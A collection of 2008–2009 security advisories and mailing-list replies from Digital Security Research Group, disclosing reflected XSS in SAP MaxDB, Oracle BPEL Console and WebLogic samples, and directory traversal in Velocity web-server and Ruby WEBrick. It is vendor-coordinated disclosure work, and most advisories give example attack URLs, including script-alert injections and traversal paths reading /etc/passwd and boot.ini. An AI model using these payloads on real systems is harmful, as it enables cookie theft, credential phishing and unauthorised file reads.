Digital Security Research Group [DSecRG] Advisory #DSECRG-09-016 !!! original advisory !!! http://dsecrg.com/pages/vul/DSECRG-09-016.html Application:SAPDB Versions Affected: Last Vendor URL: http://SAP.com Bugs: XSS Exploits: YES Reported: 20.11.2008 Vendor response:20.11.2008 Date of Public Advisory:31.03.2009 CVE-number: Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP MaxDB Web Database engine which listens port has Linked XSS security vulnerability Details *** Linked XSS vulnerability found in script webdbm. vulnerable parameters are: Server Database User Attacker can inject XSS in this parameters and steal administrators cookie. Alternatively he can make a fake login page by injecting a script than can change login page and send passwords to attacker when user try to log on. Example: *** http://[server]:/webdbm?Event=DBM_LOGONAction=VIEWServer=Database=[XSS] http://[server]:/webdbm?Event=DBM_LOGONAction=VIEWServer=User=[XSS] http://[server]:/webdbm?Event=DBM_LOGONAction=VIEWServer=Database=User=Password=[XSS] Solution *** The responsible development unit said that webdbm is outdated and that customers should deinstall it and use the Database Studio instead. See SAP note 1281820. References: *** SAP note 1281820. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru Polyakov Alexandr Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
Re[2]: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Здравствуйте, Vladimir. Вы писали 26 февраля 2009 г., 21:46:28: Dear Digital Security Research Group, --Thursday, February 26, 2009, 7:40:50 PM, you wrote to bugtraq@securityfocus.com: DSRG Application:APC PowerChute Network Shutdown's Web Interface DSRG Vendor URL: http://www.apc.com/ DSRG Bug:XSS/Response Splitting DSRG Solution: Use Firewall Just wonder: how can firewall to protect against XSS/response splitting? This Solution taken from vendors advice. Polyakov Alexandr Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
Oracle CPU Jan 2009 Advisories.
Advisories for Oracle CPU January 2009 vulnerabilities Attached. Polyakov Alexandr Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. --- Digital Security Research Group [DSecRG] Advisory#DSECRG-09-001 Application:Oracle Application Server (SOA) Versions Affected: Oracle Application Server (SOA) version 10.1.3.1.0 Vendor URL: http://www.oracle.com Bugs: XSS Exploits: YES Reported: 10.01.2008 Vendor response:11.01.2008 Date of Public Advisory:13.01.2009 CVE:CVE-2008-4014 Description:XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP Author: Alexandr Polyakov Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru) Description *** Linked XSS vulnerability found in BPEL module of Oracle Application Server (Oracle SOA Suite). Details *** Linked XSS vulnerability found in BPEL module. In page BPELConsole/default/activities.jsp attacker can inject XSS by appending it to URL Example *** http://[localhost]:/BPELConsole/default/activities.jsp?'scriptalert('DSEC_XSS')/script=DSecRG Attacker must send injected link to administrator and get adminiatrators cookie. Code with injected XSS: /th th id=activityLabel class=ListHeader align=left nowrap a href='activities.jsp?'scriptalert('DSecRG_XSS')/script=DSecRGorderBy=label' class=HeaderLink Activity Label /a /th --- Fix Information *** Information was published in CPU January 2009. All customers can download CPU petches following instructions from: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credits *** Oracle give a credits for Alexander Polyakov from Digital Security Company in CPU January 2009. http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsecrg.ru http://www.dsec.ru Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002 Application:Oracle BEA Weblogic 10 Versions Affected: Oracle BEA Weblogic 10 Vendor URL: http://oracle.com Bugs: Multiple XSS Vulnerabilities in samples Exploits: YES Reported: 16.07.2008 Vendor response:18.07.2008 Last response: 30.10.2008 Description:reviewService sample of WebLogic Server. Date of Public Advisory:13.01.2009 Authors:Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version 10.2 and latest. Details *** Vulnerabilities found in reviewService sample of Weblogic Server. 1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter name Example *** http://testserver.com:7001/reviewService/createArtist_service.jsp?name=scriptalert('DSECRG')/script 2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter title Example *** http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111title=scriptalert('DSECRG')/script 3
[DSECRG-08-028] File read in Velocity web-server
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-028 Application:Velocity web-server (a part of Velocity Security Management System) Versions Affected: Old version 1.0 Vendor URL: http://hirschelectronics.com Bugs: Directory traversal File Download Exploits: YES Reported: 03.03.2008 Second report: 14.03.2008 Vendor response:14.03.2008 Solution: No updates for this Version. Download new version. Date of Public Advisory:16.07.2008 Authors:Digital Security Research Group [DSecRG] Description *** Velocity web-server has critical directory traversal vulnerability Details *** Directory traversal vulnerability find in Velocity web-server Attacker can exploit this by sending a url with url directory traversal Example: http://[server]:[port]/../../../../../../../../../../../../../etc/passwd Fix Information *** Version 1.0 is very old and dont have updates. If you have this version please it Download the last version on http://hirschelectronics.com About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) Polyakov Alexandr Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: [EMAIL PROTECTED] www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-08-018] Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory traversal file Download Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018 Application:Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1) Versions Affected: Ruby 1.8.4 and all prior versions 1.8.5-p114 and all prior versions 1.8.6-p113 and all prior versions 1.9.0-1 and all prior version Vendor URL: http://www.ruby-lang.org/ Bugs: Directory traversal File Download Exploits: YES Reported: 20.02.2008 Vendor response:22.02.2008 Solution: 03.03.2008 Date of Public Advisory:06.03.2008 Authors: Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** WEBrick Httpd server has directory traversal security vulnerability. WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. Ruby on Rails uses WEBrick as a quick and easy webserver to start developing your Rails applications. However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment. Details *** The following programs are vulnerable. Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option Programs that publish files using WEBrick::HTTPServlet::FileHandler Affected systems are: 1. Systems that accept backslash (\) as a path separator, such as Windows. 2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X. This vulnerability has the following impacts. 1. Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator. Example: http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [.ht*, *~]). This exploit works only on systems that use case insensitive filesystems. Additional info *** WEBrick is used to build own HTTP servers and used in many applications such as Metasploit 3.1 and Karma Tools Fix Information *** fixed on 03.03.2008. http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/ Patches can be downloaded here: 1.8 series Please upgrade to 1.8.5-p115 or 1.8.6-p114. URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz (md5sum: 20ca6cc87eb077296806412feaac0356) URL:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3) 1.9 series Please apply the following patch to lib/webrick/httpservlet/filehandler.rb. URL:ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff (md5sum: b7b58aed40fa1609a67f53cfd3a13257) About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]